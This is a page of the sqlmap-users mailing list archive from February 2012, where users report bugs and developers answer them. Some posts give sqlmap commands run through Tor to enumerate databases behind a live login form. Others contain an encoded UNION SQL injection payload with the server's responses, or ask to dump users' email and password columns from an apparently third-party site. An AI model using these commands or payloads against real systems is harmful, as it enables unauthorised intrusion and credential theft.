sqlmap-users Mailing List for sqlmap (Page 66)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Miroslav S. <mir...@gm...> - 2012-02-22 06:38:23
|
Hi. As there is no DBUSERNAME in the request I would say that the request is not the problem here. Now, I am interested how Havij manages it though. Is there a way for you to provide me privately with either: target url or untouched traffic file together with Burp log for Havij run against that target? Without more info I won't be able to help you more Kind regards, Miroslav Stampar On Feb 21, 2012 10:25 PM, "John Booth" <sql...@ho...> wrote: > DBUSERNAME = database user name > > DATABASENAME = name of the current database > > > let me know if this is not helpful or if you need the snippet of html > (which is just the hopepage) > > > HTTP request [#1]: > > POST /index.asp?action=auth HTTP/1.1 > > Accept-Encoding: identity > > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > > Host: site.com > > Accept-language: en-us,en;q=0.5 > > Pragma: no-cache > > Cache-control: no-cache,no-store > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > > User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) > AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24 > > Connection: close > > > UN=admin&PW=admin&x=0&y=0 > > > HTTP response [#1] (200 OK): > > Content-length: 7091 > > X-powered-by: ASP.NET > > Set-cookie: sitecom=0; path=/, > ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/ > > Age: 6 > > Uri: http://site.com:80/index.asp?action=auth > > Server: Microsoft-IIS/6.0 > > Connection: close > > Cache-control: private > > Date: Tue, 21 Feb 2012 21:15:23 GMT > > Content-type: text/html > > > > ** > > > HTML OF HOMEPAGE - if relevant will add > > > ** > > > > ############################################################################ > > > HTTP request [#2]: > > POST /index.asp?action=auth HTTP/1.1 > > Accept-Encoding: identity > > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > > Host: site.com > > Accept-language: en-us,en;q=0.5 > > Pragma: no-cache > > Cache-control: no-cache,no-store > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > > User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) > AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24 > > Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0 > > Connection: close > > > UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2 > 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN > NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2 > 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0 > > > HTTP response [#2] (500 Internal Server Error): > > Content-length: 480 > > X-powered-by: ASP.NET > > Set-cookie: sitecom=0; path=/ > > Age: 2 > > Uri: http://www.site.com:80/index.asp?action=auth > > Server: Microsoft-IIS/6.0 > > Connection: close > > Cache-control: private, no-store > > Date: Tue, 21 Feb 2012 21:15:28 GMT > > Content-type: text/html > > > > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> > > <html> > > <head> > > <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> > > > <font face="Arial" size=2> > > <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" > size=2>error '80004005'</font> > > <p> > > <font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in > database 'DATABASENAME'.</font> > > <p> > > <font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>, > line 16</font> > > > > ############################################################################ > > > |
From: John B. <sql...@ho...> - 2012-02-21 21:23:40
|
DBUSERNAME = database user nameDATABASENAME = name of the current database let me know if this is not helpful or if you need the snippet of html (which is just the hopepage) HTTP request [#1]:POST /index.asp?action=auth HTTP/1.1Accept-Encoding: identityAccept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7Host: site.comAccept-language: en-us,en;q=0.5Pragma: no-cacheCache-control: no-cache,no-storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24Connection: close UN=admin&PW=admin&x=0&y=0 HTTP response [#1] (200 OK):Content-length: 7091X-powered-by: ASP.NETSet-cookie: sitecom=0; path=/, ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/Age: 6Uri: http://site.com:80/index.asp?action=authServer: Microsoft-IIS/6.0Connection: closeCache-control: privateDate: Tue, 21 Feb 2012 21:15:23 GMTContent-type: text/html ** HTML OF HOMEPAGE - if relevant will add ** ############################################################################ HTTP request [#2]:POST /index.asp?action=auth HTTP/1.1Accept-Encoding: identityAccept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7Host: site.comAccept-language: en-us,en;q=0.5Pragma: no-cacheCache-control: no-cache,no-storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0Connection: close UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0 HTTP response [#2] (500 Internal Server Error):Content-length: 480X-powered-by: ASP.NETSet-cookie: sitecom=0; path=/Age: 2Uri: http://www.site.com:80/index.asp?action=authServer: Microsoft-IIS/6.0Connection: closeCache-control: private, no-storeDate: Tue, 21 Feb 2012 21:15:28 GMTContent-type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80004005'</font><p><font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in database 'DATABASENAME'.</font><p><font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>, line 16</font> ############################################################################ |
From: Miroslav S. <mir...@gm...> - 2012-02-21 21:09:50
|
Hi. What technique has been used and could you please send traffic file (-t traffic.txt --fresh-queries)? Kind regards, Miroslav Stampar On Feb 21, 2012 9:37 PM, "John Booth" <sql...@ho...> wrote: > Hello, > > First some background information > > 1. Havij was able to enumerate databases, tables, columns & data on the > same URL / POST data > 2. sqlmap is unable to enumerate tables (see commands below) > 3. --banner output > Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) > Dec 16 2008 *:*:* > Copyright (c) 1988-2003 Microsoft Corporation > Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) > > > > > Command to enumerate databases: > python sqlmap.py -u "http://www.site.com/index.asp?action=auth" > --random-agent --tor --data "UN=admin&PW=admin&x=0&y=0" -p "PW" > --dbms=mssql -o --dbs > > this successfully lists all databases > > Command to enumerate tables > python sqlmap.py -u "http://www.site.com/index.asp?action=auth" > --random-agent --tor --data "UN=admin&PW=admin&x=0&y=0" -p "PW" > --dbms=mssql -o --tables -D DATABASENAME > > [15:36:20] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2003 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2000 > [15:36:20] [INFO] fetching tables for database: DATABASENAME > [15:36:24] [WARNING] the SQL query provided does not return any output > Database: DATABASENAME > [1 table] > +--+ > | | > +--+ > > [15:36:24] [WARNING] HTTP error codes detected during testing: > 500 (Internal Server Error) - 1 times > [15:36:24] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap/output/www.site.com' > > [*] shutting down at 15:36:24 > > > Any issues on what I could try? I tried --hex as well. > > > ------------------------------------------------------------------------------ > Keep Your Developer Skills Current with LearnDevNow! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Miroslav S. <mir...@gm...> - 2012-02-21 21:06:41
|
Hi. Currently, there is no support, but it's planed for sure Kind regards, Miroslav Stampar On Feb 21, 2012 9:15 PM, <bu...@gm...> wrote: > On 02/24/2011 11:43 AM, Bernardo Damele A. G. wrote: > > Hi, > > > > There exist two families of out-of-band techniques: > > > > * oob to takeover the database server and get command execution on the > > underlying os: sqlmap implements several techniques to achieve this > > already both via tcp and icmp channel. Support for takeover oob via > > dns channel (udp) is planned and will be possibly added to 1.0. > > > > * oob to exfiltrate data from the database: you refer to this. sqlmap > > does not implement yet any technique. This can be achieved on a number > > of dbms via either tcp or udp channels (mssql openrowset, pgsql > > db_link, oracle utl_*, ...) This is planned and will potentially make > > it for 1.0 release. > > What is the current state on DNS exfiltration in sqlmap? > > thanks, > buawig > > > > > ------------------------------------------------------------------------------ > Keep Your Developer Skills Current with LearnDevNow! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: John B. <sql...@ho...> - 2012-02-21 20:37:35
|
Hello, First some background information 1. Havij was able to enumerate databases, tables, columns & data on the same URL / POST data2. sqlmap is unable to enumerate tables (see commands below)3. --banner outputMicrosoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 *:*:* Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) Command to enumerate databases:python sqlmap.py -u "http://www.site.com/index.asp?action=auth" --random-agent --tor --data "UN=admin&PW=admin&x=0&y=0" -p "PW" --dbms=mssql -o --dbs this successfully lists all databases Command to enumerate tablespython sqlmap.py -u "http://www.site.com/index.asp?action=auth" --random-agent --tor --data "UN=admin&PW=admin&x=0&y=0" -p "PW" --dbms=mssql -o --tables -D DATABASENAME [15:36:20] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[15:36:20] [INFO] fetching tables for database: DATABASENAME[15:36:24] [WARNING] the SQL query provided does not return any outputDatabase: DATABASENAME[1 table]+--+| |+--+ [15:36:24] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 1 times[15:36:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.site.com' [*] shutting down at 15:36:24 Any issues on what I could try? I tried --hex as well. |
From: <bu...@gm...> - 2012-02-21 20:14:58
|
On 02/24/2011 11:43 AM, Bernardo Damele A. G. wrote: > Hi, > > There exist two families of out-of-band techniques: > > * oob to takeover the database server and get command execution on the > underlying os: sqlmap implements several techniques to achieve this > already both via tcp and icmp channel. Support for takeover oob via > dns channel (udp) is planned and will be possibly added to 1.0. > > * oob to exfiltrate data from the database: you refer to this. sqlmap > does not implement yet any technique. This can be achieved on a number > of dbms via either tcp or udp channels (mssql openrowset, pgsql > db_link, oracle utl_*, ...) This is planned and will potentially make > it for 1.0 release. What is the current state on DNS exfiltration in sqlmap? thanks, buawig |
From: <bu...@gm...> - 2012-02-21 20:14:37
|
Hi, recently I had a union based sqli vulnerability that sqlmap was not able to detect (I'm not sure if I used --level=4 but I think so). After having a look at sqlmap's requests by routing them through a proxy I saw that the only difference between my manual tests and sqlmap's was that sqlmap used "union all select" and I used "union select" and it was only detectable/exploitable using "union select". My quick and dirty 'fix' was to do a automatic on-the-fly search and replace of sqlmap's traffic with burp (replacing "union all select" with "union select"), but I wanted to share this case with you and I thought you might want to add some "union select" testcases if there are none. (I'm sorry I don't remember the DBMS in question - it probably was mssql but I'm not sure anymore.) kind regards, buawig |
From: <bu...@gm...> - 2012-02-21 20:13:51
|
> Hi buawig. > > With the latest commit (r4773) you can find a new switch --hex for doing > this kind of stuff. Currently, all 4 major DBMSes (MySQL, MSSQL, PgSQL, > Oracle) are supported for all techniques. Feel free to report any related > errors. Thanks! I'll test it on the next occasion. |
From: 朱冯贶天 <zh...@ho...> - 2012-02-21 15:35:21
|
I met with the bug again. Debug info is: sqlmap version: 1.0-dev (r4770)Python version: 2.7.1Operating system: ntCommand line: sqlmap.py -u ******************************************************************************************************************* -v 3 --text-only-o --threads=10 --drop-set-cookie --cookie *************************************************************************************************************************************************************************************************************************************************************************************************************************** -D ************* --dump --risk 3Technique: ERRORBack-end DBMS: Microsoft SQL Server (fingerprinted)Traceback (most recent call last): File "D:\temp_workspace\PyLearning\src\sqlmap\_sqlmap.py", line 83, in main start() File "D:\temp_workspace\PyLearning\src\sqlmap\lib\controller\controller.py", line 565, in start action() File "D:\temp_workspace\PyLearning\src\sqlmap\lib\controller\action.py", line109, in action conf.dbmsHandler.dumpTable() File "D:\temp_workspace\PyLearning\src\sqlmap\plugins\generic\enumeration.py", line 1762, in dumpTable conf.dumper.dbTableValues(kb.data.dumpedTable) File "D:\temp_workspace\PyLearning\src\sqlmap\lib\core\dump.py", line 458, indbTableValues if re.search("^[\ *]*$", value): File "C:\Program Files\Python27\lib\re.py", line 142, in search return _compile(pattern, flags).search(string)TypeError: expected string or buffer Glad to hear from you.Thank you. |
From: Miroslav S. <mir...@gm...> - 2012-02-21 11:31:03
|
Hi buawig. With the latest commit (r4773) you can find a new switch --hex for doing this kind of stuff. Currently, all 4 major DBMSes (MySQL, MSSQL, PgSQL, Oracle) are supported for all techniques. Feel free to report any related errors. Kind regards, Miroslav Stampar On Tue, Feb 21, 2012 at 12:53 AM, <bu...@gm...> wrote: > Hi, > > I'm using sqlmap mostly for exploiting a sqli/dumping contents. > > In the current case I've got a simple union based sqli in a MySQL 4.1.x DB. > > ..&x=foo union select 1,1,1,1 -- > (works) > > ..&x=foo union select 1,user(),1,1 -- > (doesn't work: Illegal mix of collation) > > to work around the collation issue I used hex() to manually extracting > information: > ..&x=foo union select 1,hex(user()),1,1 -- > (works) > > Usually I try to give sqlmap all the information it needs to quickly > confirm a manually found sqli. > > sqlmap .... --technique=U --union-char=1 --union-cols=4 > > detects the sqli but when trying to actually extract information it runs > into the mix of collations problem and suggests to use a the 'hidden' > switch --no-cast, which doesn't solve the problem. > > Is there a way to tell sqlmap to use hex() to work around the collation > issue? > > thanks > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-02-21 09:01:41
|
Hi Alex. Session file mechanism is deprecated for the last few months and (mostly) obsolete for the last few days. Now all techniques are using new HashDB mechanism which substantially improves all things related to storing and resuming "session data". Hence, you are strongly advised to update to the latest v1.0-dev from our repository to have it up to date: svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev Also, two things. As you are using BT it's quite possibly that you are using older v0.9 which is quite old this moment. The other thing is that there is no way to retrieve data from old session file and store it into the CSV. So, I would advise you to continue the dumping (you won't be able to use that old session data in new version) as you have started with that older version and in future runs use new (development) version of sqlmap. Kind regards, Miroslav Stampar On Mon, Feb 20, 2012 at 7:45 PM, Alex Smith <m3...@gm...> wrote: > > Hello, > First i would like to say Sqlmap is one of the best projects out there. > > > The question i have is, im currently using sqlmap to download 2 columns > from a MySQL DB and its using time-based blind injection which is taking > too long for the dump to complete and the session file has reached 13mb, > and is there any way to cancel the dump process and put all the data > into .csv file (like once is finishes properlly)??? > > Here are some details to help... > This is the command in using in backtrack5, python ./sqlmap.py -u > http://www.**********/features.php?id=678 --dump -C > usr_id,usr_email,usr_pass -T tbl_users --threads=10 > > MySql Version: MySQL 5.0.11 > > time-based blind injection > > > > Thank you in advance, Alex > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: <bu...@gm...> - 2012-02-20 23:56:01
|
Hi, I'm using sqlmap mostly for exploiting a sqli/dumping contents. In the current case I've got a simple union based sqli in a MySQL 4.1.x DB. ..&x=foo union select 1,1,1,1 -- (works) ..&x=foo union select 1,user(),1,1 -- (doesn't work: Illegal mix of collation) to work around the collation issue I used hex() to manually extracting information: ..&x=foo union select 1,hex(user()),1,1 -- (works) Usually I try to give sqlmap all the information it needs to quickly confirm a manually found sqli. sqlmap .... --technique=U --union-char=1 --union-cols=4 detects the sqli but when trying to actually extract information it runs into the mix of collations problem and suggests to use a the 'hidden' switch --no-cast, which doesn't solve the problem. Is there a way to tell sqlmap to use hex() to work around the collation issue? thanks |
From: Alex S. <m3...@gm...> - 2012-02-20 18:45:43
|
Hello, First i would like to say Sqlmap is one of the best projects out there. The question i have is, im currently using sqlmap to download 2 columns from a MySQL DB and its using time-based blind injection which is taking too long for the dump to complete and the session file has reached 13mb, and is there any way to cancel the dump process and put all the data into .csv file (like once is finishes properlly)??? Here are some details to help... This is the command in using in backtrack5, python ./sqlmap.py -u http://www.**********/features.php?id=678 --dump -C usr_id,usr_email,usr_pass -T tbl_users --threads=10 MySql Version: MySQL 5.0.11 time-based blind injection Thank you in advance, Alex |
From: Miroslav S. <mir...@gm...> - 2012-02-20 09:48:04
|
Hi Tiago. Find it fixed with the latest r4767. Kind regards, Miroslav Stampar On Mon, Feb 20, 2012 at 2:22 AM, Tiago Natel de Moura <tia...@gm... > wrote: > Anyone have this problem with the sqlmap in trunk ? > > [22:20:52] [INFO] first request to Google to get the session cookie > [22:20:52] [INFO] using Google result page #1 > [22:20:53] [CRITICAL] unable to find results for your Google dork > expression > > [*] shutting down at 22:20:53 > > For every dork that I've tried I got the same result above. > > -- > > Tiago Natel de Moura > Consultor de Segurança da Informação > http://www.linkedin.com/in/tiagonatel > http://www.secplus.com.br/ > http://github.com/tiago4orion > http://code.google.com/p/bugsec > > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-02-20 09:47:35
|
Hi. Find it fixed with the latest r4767. Kind regards, Miroslav Stampar On Sat, Feb 18, 2012 at 3:44 PM, 叶晓勇 <gr...@gm...> wrote: > Hi > > I got the "unable to find results for your Google dork expression" problem > in sqlmap/1.0-dev (r4766) ,can anybody help? > > regards! > > > ------------------------------------------------------------------------------ > Virtualization & Cloud Management Using Capacity Planning > Cloud computing makes use of virtualization - but cloud computing > also focuses on allowing computing to be delivered as a service. > http://www.accelacomm.com/jaw/sfnl/114/51521223/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Tiago N. de M. <tia...@gm...> - 2012-02-20 01:23:11
|
Anyone have this problem with the sqlmap in trunk ? [22:20:52] [INFO] first request to Google to get the session cookie [22:20:52] [INFO] using Google result page #1 [22:20:53] [CRITICAL] unable to find results for your Google dork expression [*] shutting down at 22:20:53 For every dork that I've tried I got the same result above. -- Tiago Natel de Moura Consultor de Segurança da Informação http://www.linkedin.com/in/tiagonatel http://www.secplus.com.br/ http://github.com/tiago4orion http://code.google.com/p/bugsec |
From: 叶晓勇 <gr...@gm...> - 2012-02-18 14:44:07
|
Hi I got the "unable to find results for your Google dork expression" problem in sqlmap/1.0-dev (r4766) ,can anybody help? regards! |
From: Miroslav S. <mir...@gm...> - 2012-02-14 10:11:31
|
Hi Shadow. This is a pretty old revision (r4009 vs current r4745). Could you please report if this happens on new revision too. Kind regards, Miroslav Stampar On Tue, Feb 14, 2012 at 3:33 AM, Shadow Folder <sha...@gm...>wrote: > [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the > bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4009) > Python version: 2.6.5 > Operating system: posix > Command line: sqlmap.py -u > ************************************************************** --proxy= > http://00000:80 --random-agent -D ********* -T **** -C ************* > --dump --start=1 --stop=20 > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "sqlmap.py", line 86, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 539, > in start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 109, in > action > conf.dbmsHandler.dumpTable() > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line > 1551, in dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "/pentest/database/sqlmap/lib/request/inject.py", line 434, in > getValue > value = __goInband(query, expected, sort, resumeValue, unpack, dump) > File "/pentest/database/sqlmap/lib/request/inject.py", line 386, in > __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "/pentest/database/sqlmap/lib/techniques/inband/union/use.py", line > 332, in unionUse > runThreads(numThreads, unionThread) > File "/pentest/database/sqlmap/lib/core/threads.py", line 62, in > runThreads > threadFunction() > File "/pentest/database/sqlmap/lib/techniques/inband/union/use.py", line > 302, in unionThread > output = __oneShotUnionUse(limitedExpr, unpack) > File "/pentest/database/sqlmap/lib/techniques/inband/union/use.py", line > 79, in __oneShotUnionUse > extractRegexResult(check, removeReflectiveValues(page, payload), > re.DOTALL | re.IGNORECASE), \ > File "/pentest/database/sqlmap/lib/core/common.py", line 2514, in > removeReflectiveValues > if regex.split(REFLECTED_NON_ALPHA_NUM_REGEX)[0].lower() in > content.lower(): # fast optimization check > UnicodeDecodeError: 'ascii' codec can't decode byte 0x96 in position 90: > ordinal not in range(128) > > [*] shutting down at: 04:32:26 > > > > ------------------------------------------------------------------------------ > Keep Your Developer Skills Current with LearnDevNow! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-02-14 09:14:03
|
Hi. Those parenthesis inside are indeed looking like they are "tainting" the parameter value. Nevertheless, they are a valid parameter value and hence with the latest commit (r4745), you'll be presented with this kind of message: [10:10:46] [WARNING] it appears that you have provided tainted parameter values ('id=1'') with most probably leftover chars from manual sql injection tests (;()') or non-valid numerical value. Please, always use only valid parameter values so sqlmap could be able to properly run Are you sure you want to continue? [y/N] where you'll be able to choose by yourself if you want to continue or not. Kind regards, Miroslav Stampar On Mon, Feb 13, 2012 at 5:15 PM, garthoid <gar...@gm...> wrote: > Hi, > > I am encountering this message since my last update of Sqlmap. Version > 0.9 does not encounter this problem with the same request. > > [10:56:28] [INFO] parsing HTTP request from './dump/save.txt' > [10:56:28] [CRITICAL] you have provided tainted parameter values > ('amp;icon=stuff.gif</thumbnail><someItem><item id="gate" > value="/something.cgi"/><item id="report" value="stID(') with most > probably leftover chars from manual sql injection tests (;()') or > non-valid numerical value. Please, always use only valid parameter > values so sqlmap could be able to properly run > > > Here is the fragment that it is complaining about: > > &deficon=stuff.gif</thumbnail><someItem><item id="gate" > value="/something.cgi"/><item id="report" > value="stID("iC15DBE0F9A7E4F3E86EE5DA47D5A31DC")"/> > > Here is the version I am running: > > sqlmap/1.0-dev (r4744) > > The original request was captured with Burp. It was a clean test with > no injection or other manipulation happening at that time. > > Thoughts? > > Thanks in advance, > Garth > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: Shadow F. <sha...@gm...> - 2012-02-14 02:33:42
|
[CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4009) Python version: 2.6.5 Operating system: posix Command line: sqlmap.py -u ************************************************************** --proxy= http://00000:80 --random-agent -D ********* -T **** -C ************* --dump --start=1 --stop=20 Technique: UNION Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "sqlmap.py", line 86, in main start() File "/pentest/database/sqlmap/lib/controller/controller.py", line 539, in start action() File "/pentest/database/sqlmap/lib/controller/action.py", line 109, in action conf.dbmsHandler.dumpTable() File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 1551, in dumpTable entries = inject.getValue(query, blind=False, dump=True) File "/pentest/database/sqlmap/lib/request/inject.py", line 434, in getValue value = __goInband(query, expected, sort, resumeValue, unpack, dump) File "/pentest/database/sqlmap/lib/request/inject.py", line 386, in __goInband output = unionUse(expression, unpack=unpack, dump=dump) File 